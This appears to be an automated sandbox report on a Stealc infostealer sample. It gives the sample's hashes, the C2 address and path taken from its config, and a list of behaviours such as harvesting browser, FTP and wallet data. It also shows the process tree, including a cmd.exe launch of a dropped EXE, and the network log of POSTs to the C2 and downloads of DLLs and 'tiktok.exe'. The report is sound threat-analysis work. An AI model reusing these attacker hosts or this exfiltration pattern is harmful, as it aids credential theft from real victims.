Analysis

  • max time kernel
    192s
  • max time network
    297s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    07/06/2024, 00:38 UTC

General

  • Target

    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe

  • Size

    249KB

  • MD5

    89ef597ad4066073fc1adfdd7e2487e8

  • SHA1

    053d0deee8a5a4ed5bac4e0e7a643ddbeee94084

  • SHA256

    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7

  • SHA512

    f48aaced3771f780e145d20e977b4aa8d2be8227c52a6b7f2e65b126d806d7ba619288572fc381ab38077081ba48f501b2b4a9e85e34f109d7a454f5b74ca78c

  • SSDEEP

    3072:ZiNo04Zd5/Dj53rOxGMWw2jzr5K+LWorYHLWorYO/IYE:ZijifnspWTfPL10HL10QE

Malware Config

Extracted

Family

stealc

Botnet

default12

C2

http://185.172.128.170

Attributes
  • url_path

    /7043a0c6a68d9c65.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    "C:\Users\Admin\AppData\Local\Temp\9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe
        "C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe"
        3⤵
        • Executes dropped EXE
        PID:304

Network

  • Country: DE
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
    Host: 185.172.128.170
    Content-Length: 216
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 156
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • Country: DE
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKEGHIJJEHJDGCBFHCGI
    Host: 185.172.128.170
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 1520
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • Country: DE
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
    Host: 185.172.128.170
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 5416
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • Country: DE
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
    Host: 185.172.128.170
    Content-Length: 4207
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:03 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=97
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • Country: DE
    GET
    http://185.172.128.170/8420e83ceb95f3af/sqlite3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
    ETag: "10e436-5e7eeebed8d80"
    Accept-Ranges: bytes
    Content-Length: 1106998
    Content-Type: application/x-msdos-program
  • Country: DE
    POST
    http://185.172.128.170/7043a0c6a68d9c65.php
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    POST /7043a0c6a68d9c65.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHI
    Host: 185.172.128.170
    Content-Length: 359
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=95
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • Country: DE
    GET
    http://185.172.128.170/8420e83ceb95f3af/freebl3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:04 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "a7550-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 685392
    Content-Type: application/x-msdos-program
  • Country: DE
    GET
    http://185.172.128.170/8420e83ceb95f3af/mozglue.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "94750-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 608080
    Content-Type: application/x-msdos-program
  • Country: DE
    GET
    http://185.172.128.170/8420e83ceb95f3af/msvcp140.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "6dde8-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 450024
    Content-Type: application/x-msdos-program
  • Country: DE
    GET
    http://185.172.128.170/8420e83ceb95f3af/nss3.dll
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.170:80
    Request
    GET /8420e83ceb95f3af/nss3.dll HTTP/1.1
    Host: 185.172.128.170
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:05 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
    ETag: "1f3950-5e7ebd4425100"
    Accept-Ranges: bytes
    Content-Length: 2046288
    Content-Type: application/x-msdos-program
  • Country: US
    DNS
    170.128.172.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    170.128.172.185.in-addr.arpa
    IN PTR
    Response
  • Country: DE
    GET
    http://185.172.128.159/tiktok.exe
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    Remote address:
    185.172.128.159:80
    Request
    GET /tiktok.exe HTTP/1.1
    Host: 185.172.128.159
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 07 Jun 2024 00:39:19 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
    ETag: "85400-616de2c892480"
    Accept-Ranges: bytes
    Content-Length: 545792
    Content-Type: application/x-msdos-program
  • Country: US
    DNS
    159.128.172.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    159.128.172.185.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • Country: US
    DNS
    174.117.168.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.117.168.52.in-addr.arpa
    IN PTR
    Response
  • 185.172.128.170:80
    http://185.172.128.170/8420e83ceb95f3af/nss3.dll
    http
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    2.0MB
    3.8MB
    4250
    3809

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/sqlite3.dll

    HTTP Response

    200

    HTTP Request

    POST http://185.172.128.170/7043a0c6a68d9c65.php

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/freebl3.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/mozglue.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/msvcp140.dll

    HTTP Response

    200

    HTTP Request

    GET http://185.172.128.170/8420e83ceb95f3af/nss3.dll

    HTTP Response

    200
  • 185.172.128.159:80
    http://185.172.128.159/tiktok.exe
    http
    9a3f94d8853f20963184f34cf75ecc08678ff43ec7ba524e54c1825d42d9f7d7.exe
    20.5kB
    563.0kB
    426
    424

    HTTP Request

    GET http://185.172.128.159/tiktok.exe

    HTTP Response

    200
  • 8.8.8.8:53
    170.128.172.185.in-addr.arpa
    dns
    74 B
    74 B
    1
    1

    DNS Request

    170.128.172.185.in-addr.arpa

  • 8.8.8.8:53
    159.128.172.185.in-addr.arpa
    dns
    74 B
    74 B
    1
    1

    DNS Request

    159.128.172.185.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    174.117.168.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    174.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Are.docx

    Filesize

    11KB

    MD5

    a33e5b189842c5867f46566bdbf7a095

    SHA1

    e1c06359f6a76da90d19e8fd95e79c832edb3196

    SHA256

    5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

    SHA512

    f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

  • C:\Users\Admin\AppData\Local\Temp\BFHJECAAAF.exe

    Filesize

    533KB

    MD5

    6c93fc68e2f01c20fb81af24470b790c

    SHA1

    d5927b38a32e30afcf5a658612a8266476fc4ad8

    SHA256

    64a71b664d76641b35dac312161cb356b3b3b5f0b45c9d88c8afa547b4902580

    SHA512

    355e9677121ef17cf8c398f0c17399776d206c62014080a2c62682e1152ea0729dcc6e233358dcd6bae009b07e3db936d4b18eb37d6e7ebc2fe9cf8d827c4ade

  • \ProgramData\mozglue.dll

    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • \ProgramData\nss3.dll

    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • memory/1468-2-0x0000000001D10000-0x0000000001D37000-memory.dmp

    Filesize

    156KB

  • memory/1468-3-0x0000000000400000-0x000000000063B000-memory.dmp

    Filesize

    2.2MB

  • memory/1468-1-0x0000000001DA0000-0x0000000001EA0000-memory.dmp

    Filesize

    1024KB

  • memory/1468-4-0x0000000061E00000-0x0000000061EF3000-memory.dmp

    Filesize

    972KB

  • memory/1468-71-0x0000000000400000-0x0000000001BB8000-memory.dmp

    Filesize

    23.7MB

  • memory/1468-80-0x0000000000400000-0x000000000063B000-memory.dmp

    Filesize

    2.2MB

  • memory/1468-79-0x0000000000400000-0x0000000001BB8000-memory.dmp

    Filesize

    23.7MB